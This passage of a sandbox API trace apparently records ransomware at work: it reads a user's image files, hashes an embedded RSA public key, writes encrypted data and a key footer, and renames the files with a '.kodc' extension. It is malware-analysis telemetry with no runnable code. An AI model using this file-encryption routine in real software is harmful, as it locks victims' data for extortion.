[0099.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae38 | out: hHeap=0x630000) returned 1 [0099.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae20 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9dde0 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.310] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.311] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x85d9, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x85d9, lpOverlapped=0x0) returned 1 [0099.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.311] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.311] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0099.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0099.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.312] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.312] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.312] CloseHandle (hObject=0x5cc) returned 1 [0099.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.321] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6sxsnfrZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6sxsnfrz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6sxsnfrZ.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6sxsnfrz.jpg.kodc")) returned 1 [0099.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.322] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd0ad910, ftCreationTime.dwHighDateTime=0x1d5b8af, ftLastAccessTime.dwLowDateTime=0x223c82d0, ftLastAccessTime.dwHighDateTime=0x1d5ba62, ftLastWriteTime.dwLowDateTime=0x223c82d0, ftLastWriteTime.dwHighDateTime=0x1d5ba62, nFileSizeHigh=0x0, nFileSizeLow=0xd841, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="811SACyKM33.gif", cAlternateFileName="811SAC~1.GIF")) returned 1 [0099.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.323] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\811SACyKM33.gif") returned=".gif" [0099.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\811SACyKM33.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\811sacykm33.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.324] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=55361) returned 1 [0099.324] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.327] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd81b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.327] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.328] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.328] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xd841, lpOverlapped=0x0) returned 1 [0099.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.329] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.330] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.330] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.330] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.330] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.330] GetLastError () returned 0x0 [0099.330] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.330] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.330] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.330] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.331] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.331] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd840) returned 0x9ba6d90 [0099.331] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.331] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dde0 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9de28 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae20 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.331] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.331] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae68 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ae50 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.332] GetCurrentThreadId () returned 0x42c [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5108 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.333] GetCurrentThreadId () returned 0x42c [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae38 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae80 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0099.335] 